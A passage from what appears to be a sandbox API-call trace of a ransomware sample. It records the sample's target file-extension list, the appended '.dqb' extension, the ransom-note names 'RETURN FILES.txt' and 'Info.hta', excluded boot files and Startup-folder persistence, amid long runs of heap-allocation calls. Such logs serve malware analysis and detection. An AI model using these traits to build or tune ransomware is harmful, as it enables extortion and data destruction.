r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0264.617] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x660d18 | out: hHeap=0x5e0000) returned 1 [0264.617] lstrlenW (lpString="") returned 0 [0264.617] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x640278 | out: hHeap=0x5e0000) returned 1 [0264.617] lstrlenW (lpString=".dqb") returned 4 [0264.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619368, Size=0x8) returned 0x619368 [0264.617] lstrlenW (lpString=".dqb") returned 4 [0264.617] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x640278 | out: hHeap=0x5e0000) returned 1 [0264.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6402a8, Size=0x20) returned 0x5f44b8 [0264.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f44b8, Size=0x40) returned 0x61ab70 [0264.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ab70, Size=0x80) returned 0x65ed30 [0264.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661e68, Size=0x8) returned 0x661e78 [0264.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661e78, Size=0x10) returned 0x6402a8 [0264.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6402a8, Size=0x20) returned 0x5f4490 [0264.617] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0264.617] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65ed30 | out: hHeap=0x5e0000) returned 1 [0264.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6402d8, Size=0x20) returned 0x619a10 [0264.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619a10, Size=0x40) returned 0x61ab70 [0264.617] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0264.617] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0264.617] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61ab70 | out: hHeap=0x5e0000) returned 1 [0264.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6402d8, Size=0x20) returned 0x619a10 [0264.618] lstrlenW (lpString="Info.hta") returned 8 [0264.618] lstrlenW (lpString="Info.hta") returned 8 [0264.618] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a10 | out: hHeap=0x5e0000) returned 1 [0264.618] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x640528, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe")) returned 0x47 [0264.618] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x640528 | out: hHeap=0x5e0000) returned 1 [0264.618] lstrlenW (lpString="ivttvf.exe") returned 10 [0264.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4490, Size=0x40) returned 0x61ab70 [0264.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6402d8, Size=0x20) returned 0x5f4490 [0264.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6402d8, Size=0x20) returned 0x619a10 [0264.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619a10, Size=0x40) returned 0x61abb8 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61abb8, Size=0x80) returned 0x65ed30 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x61d8c0 [0264.619] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0264.619] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61d8c0 | out: hHeap=0x5e0000) returned 1 [0264.619] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x640528, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0264.619] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x662d20 | out: hHeap=0x5e0000) returned 1 [0264.619] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x640528 | out: hHeap=0x5e0000) returned 1 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661e78, Size=0x8) returned 0x661e68 [0264.619] lstrlenW (lpString="%windir%;") returned 9 [0264.619] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4490 | out: hHeap=0x5e0000) returned 1 [0264.619] lstrlenW (lpString="C:\\Windows;") returned 11 [0264.619] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62ed18 | out: hHeap=0x5e0000) returned 1 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6402f0, Size=0x20) returned 0x5f4490 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4490, Size=0x40) returned 0x61abb8 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61abb8, Size=0x80) returned 0x65ed30 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x61d8c0 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661ea8, Size=0x8) returned 0x661eb8 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661eb8, Size=0x10) returned 0x640338 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x640338, Size=0x20) returned 0x5f4490 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661e78, Size=0x8) returned 0x661eb8 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661e88, Size=0x8) returned 0x661e78 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661ea8, Size=0x8) returned 0x661ec8 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661ec8, Size=0x10) returned 0x6403e0 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6403e0, Size=0x20) returned 0x619a10 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661eb8, Size=0x10) returned 0x6403e0 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661e78, Size=0x10) returned 0x640410 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661eb8, Size=0x8) returned 0x661ea8 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661ed8, Size=0x8) returned 0x661ee8 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6403e0, Size=0x20) returned 0x619a60 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x640410, Size=0x20) returned 0x619970 [0264.619] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661ef8, Size=0x8) returned 0x661f08 [0264.620] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0264.620] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61d8c0 | out: hHeap=0x5e0000) returned 1 [0264.620] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x640488, Size=0x20) returned 0x619a88 [0264.620] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x62ed18, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0264.620] lstrlenW (lpString="C:\\") returned 3 [0264.620] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0264.620] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62ed18 | out: hHeap=0x5e0000) returned 1 [0264.621] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661f38, Size=0x82) returned 0x61d980 [0264.621] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661f58, Size=0x100) returned 0x61da10 [0264.621] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61d980, Size=0x104) returned 0x661118 [0264.621] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61da10, Size=0x200) returned 0x661228 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x661f48 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x661228 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x660d48 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65eec8 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6404e8 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65ef50 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x660d30 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x661118 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x640500 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61db18 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x660d60 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61dba8 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x660d78 | out: hHeap=0x5e0000) returned 1 [0264.622] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x640500, Size=0x20) returned 0x619ab0 [0264.622] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619ab0, Size=0x40) returned 0x61abb8 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x661f18 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x640488 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61d8f0 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6404b8 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65ee40 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6404a0 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x661f28 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6404d0 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61d8c0 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61a158 | out: hHeap=0x5e0000) returned 1 [0264.622] lstrlenW (lpString="%systemdrive%") returned 13 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a88 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65ed30 | out: hHeap=0x5e0000) returned 1 [0264.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x661ef8 | out: hHeap=0x5e0000) returned 1 [0264.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x61ecf8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100 [0264.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10014) returned 0x662d20 [0264.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6404d0 [0264.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6404d0, Size=0x20) returned 0x619ab0 [0264.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619ab0, Size=0x40) returned 0x61ac00 [0264.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ac00, Size=0x80) returned 0x65ed30 [0264.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x61d8f8 [0264.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61d8f8, Size=0x200) returned 0x61d8f8 [0264.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61d8f8, Size=0x400) returned 0x661118 [0264.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661118, Size=0x800) returned 0x661118 [0264.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661118, Size=0x1000) returned 0x672d40 [0264.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x640528 [0264.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6404d0 [0264.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6404a0 [0264.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x661ef8 [0264.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6404b8 [0264.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x661f28 [0264.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x640488 [0264.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661ef8, Size=0x8) returned 0x661f18 [0264.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6404e8 [0264.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661f18, Size=0x10) returned 0x660d30 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660d48 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660d60 [0264.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x660d30, Size=0x20) returned 0x619ab0 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660d30 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661f18 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x660d78 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x660d90 [0264.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619ab0, Size=0x40) returned 0x61ac00 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x660da8 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x660dc0 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x660dd8 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x660df0 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660e08 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660e20 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661ef8 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660e38 [0264.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ac00, Size=0x80) returned 0x65ed30 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660e50 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660e68 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660e80 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660e98 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660eb0 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x660ec8 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660ee0 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661f58 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660ef8 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660f10 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x660f28 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660f40 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x660f58 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660f70 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x660f88 [0264.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660fa0 [0264.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x630d38 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660fb8 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660fd0 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x660fe8 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x661000 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661018 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661030 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661f38 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661048 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661060 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661078 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x661f68 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661090 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6610a8 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661f78 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6610c0 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6610d8 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6610f0 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661130 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661148 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661160 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x661178 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661190 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6611a8 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6611c0 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6611d8 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6611f0 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661208 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661f88 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661220 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661238 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661250 [0264.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661268 [0264.626] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x630d38, Size=0x200) returned 0x673d48 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661280 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661f98 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661298 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6612b0 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6612c8 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6612e0 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6612f8 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661310 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661328 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661340 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661358 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x661370 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x661388 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6613a0 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6613b8 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6613d0 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6613e8 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661400 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x661418 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x661430 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661448 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661460 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661478 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661fa8 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661490 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6614a8 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6614c0 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661fb8 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6614d8 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6614f0 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661530 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661548 [0264.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661560 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661578 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661590 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6615a8 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6615c0 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6615d8 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6615f0 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661608 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661620 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x661638 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661650 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661668 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661680 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661698 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6616b0 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6616c8 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6616e0 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661fc8 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x661fd8 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 